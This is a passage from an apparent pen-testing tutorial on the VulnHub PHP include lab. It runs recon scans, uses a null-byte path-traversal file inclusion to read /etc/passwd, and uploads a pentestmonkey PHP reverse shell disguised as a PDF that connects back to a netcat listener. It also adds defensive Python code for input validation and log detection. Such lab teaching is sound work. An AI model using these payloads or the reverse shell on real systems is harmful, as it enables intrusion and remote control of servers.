November 6, 2019 · Basic Pen-Testing

10.4 : Web app exploitation - Local file inclusion (Part IV)

Cracking PHP Include And Post Exploitation lab

Before we start cracking web apps in general, let's work through the PHP Include And Post Exploitation lab.

Download php_include_and_post_exploitation.iso from the link below and boot it as a live CD:
https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

Recon

We can use the traditional netdiscover for basic host discovery, and nmap for a detailed service scan.

netdiscover

 Currently scanning: 172.16.138.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor
 192.168.56.100  08:00:27:75:46:19      1      60  PCS Systemtechnik GmbH
 192.168.56.104  08:00:27:b0:86:4d      1      60  PCS Systemtechnik GmbH

192.168.56.104 is our target.

nmap

root@kali:/etc/nginx# nmap -sSV --version-intensity 9 192.168.56.104
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-05 20:31 PST
Nmap scan report for 192.168.56.104
Host is up (0.00024s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:B0:86:4D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.89 seconds

Only port 80 is open, so the web application is the whole attack surface.


CVE & vulnerability scanning

nikto

root@kali:/etc/nginx# nikto -h 192.168.56.104
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        80
+ Start Time:         2019-11-05 21:11:19 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 3513, size: 5108, mtime: Tue Aug 28 03:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8725 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2019-11-05 21:11:32 (GMT-8) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto flags /index.php as a possible file inclusion, so let's try local file inclusion through the page parameter.

curl --path-as-is http://192.168.56.104/index.php?page=../../../../../../../../etc/passwd

  <div class="block" id="block-text">
    <div class="secondary-navigation">

      <div class="content">

Warning: include(../../../../../../../../etc/passwd.php): failed to open stream: No such file or directory in /var/www/index.php on line 28

Warning: include(): Failed opening '../../../../../../../../etc/passwd.php' for inclusion (include_path='.:') in /var/www/index.php on line 28
     </div>

    </div>
  </div>




        <div id="footer">
          <div class="block">
            <p>Copyright </p>
          </div>
        </div>

      </div>

The warning shows that index.php appends .php to whatever we pass, so the include targets /etc/passwd.php, which does not exist. In old versions of PHP a %00 null byte terminates the path string, so the appended .php suffix is silently dropped; see
https://security.stackexchange.com/questions/66414/getting-null-byte-injection-attacks-to-work-with-php-5-2-17
Let's try again with the null byte appended.

root@kali:/etc/nginx# curl --path-as-is http://192.168.56.104/index.php?page=../../../../../../../../etc/passwd%00

  <div class="block" id="block-text">
    <div class="secondary-navigation">

      <div class="content">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
     </div>

    </div>
  </div>
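To show what a fixed index.php has to check, here is an added Python model of the page-parameter validation (it is not the lab's code and not PHP). The lab's script effectively does include($_GET['page'] . '.php'); PAGES_DIR and the allow-list below are assumptions.

```python
import os
import urllib.parse
from typing import Optional, Tuple

# Added example: a Python model of the check a fixed index.php needs.
# The three tests below each block one trick used in this walkthrough.
# PAGES_DIR and ALLOWED are assumptions, not values from the lab.
PAGES_DIR = os.path.realpath("/var/www/pages")
ALLOWED = {"index", "about", "contact"}


def resolve_page(page_param: str) -> Tuple[Optional[str], str]:
    """Map the raw ?page= value to a file path, or (None, reason) if rejected."""
    page = urllib.parse.unquote(page_param)
    # 1. A NUL byte is never legitimate input. On the lab's PHP 5.3.2 it cut the
    #    path short, so the appended ".php" vanished and ../../etc/passwd%00 or
    #    uploads/shell.pdf%00 was included as-is.
    if "\x00" in page:
        return None, "null byte in page parameter"
    # 2. An allow-list of page names removes the need to recognise every
    #    traversal encoding; anything not listed is refused outright.
    if page not in ALLOWED:
        return None, "page not in allow-list"
    # 3. Defence in depth: even an allowed name must resolve inside PAGES_DIR
    #    (guards against a later change that relaxes the allow-list).
    full = os.path.realpath(os.path.join(PAGES_DIR, page + ".php"))
    if os.path.commonpath([PAGES_DIR, full]) != PAGES_DIR:
        return None, "path escapes pages directory"
    return full, "ok"
```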

Upload a reverse shell & craft a PDF attack vector

That works. Next, we can craft a PHP reverse shell and try to upload it. For this lab we use the pentestmonkey reverse shell:
https://github.com/pentestmonkey/php-reverse-shell

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > shell.pdf

Open it in your favourite text editor, prepend %PDF-1.4 so the file passes as a PDF, and change the connection settings ($ip and $port) to point at your listener.

%PDF-1.4

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
....
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.101';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

The top of the edited file should look like the excerpt above.

Back on your Kali Linux box, start listening on port 4444:

root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Upload shell.pdf to the site, then browse to 192.168.56.104/index.php?page=uploads/shell.pdf%00: the null byte drops the appended .php, and the uploaded file is included and executed as PHP.


root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.56.104.
Ncat: Connection from 192.168.56.104:33439.
Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
 05:24:23 up 57 min,  6 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
user     tty2                      04:27   56:59   0.00s  0.00s -bash
user     tty3                      04:27   56:59   0.00s  0.00s -bash
user     tty4                      04:27   56:59   0.00s  0.00s -bash
user     tty5                      04:27   56:59   0.00s  0.00s -bash
user     tty6                      04:27   56:59   0.00s  0.00s -bash
user     tty1                      04:27   56:59   0.00s  0.00s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data

Got it.
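From the defender's side, every step of this walkthrough leaves a distinctive trace in the Apache access log. Here is an added Python detector (not part of the lab) run over constructed combined-log lines modelled on the requests made above; the timestamps, sizes and user agents are made up.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed Apache combined-log lines modelled on this walkthrough's requests.
# Only the GET requests are shown; the page does not reveal the upload form's URL.
SAMPLE_LOG = """\
192.168.56.101 - - [05/Nov/2019:21:30:01 -0800] "GET /index.php?page=about HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.56.101 - - [05/Nov/2019:21:30:05 -0800] "GET /index.php?page=../../../../../../../../etc/passwd HTTP/1.1" 200 812 "-" "curl/7.66.0"
192.168.56.101 - - [05/Nov/2019:21:30:09 -0800] "GET /index.php?page=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 2044 "-" "curl/7.66.0"
192.168.56.101 - - [05/Nov/2019:21:31:52 -0800] "GET /index.php?page=uploads/shell.pdf%00 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target: str) -> List[str]:
    """Return the file-inclusion indicators present in one request target."""
    flags: List[str] = []
    query = urllib.parse.urlsplit(target).query
    # parse_qs percent-decodes, so %00 becomes a real NUL byte here.
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if "\x00" in value:
                flags.append(f"null-byte in {name}")
            if "../" in value.replace("\\", "/"):
                flags.append(f"traversal in {name}")
            if name == "page" and value.startswith("uploads/"):
                flags.append("include of upload directory")
    return flags


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse each log line and report those carrying at least one indicator."""
    hits: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        flags = classify_request(m["target"])
        if flags:
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": int(m["status"]), "flags": flags})
    return hits
```

A 200 status on a flagged request is the signal worth alerting on: the traversal without %00 returned only a PHP warning, whereas the null-byte variants succeeded.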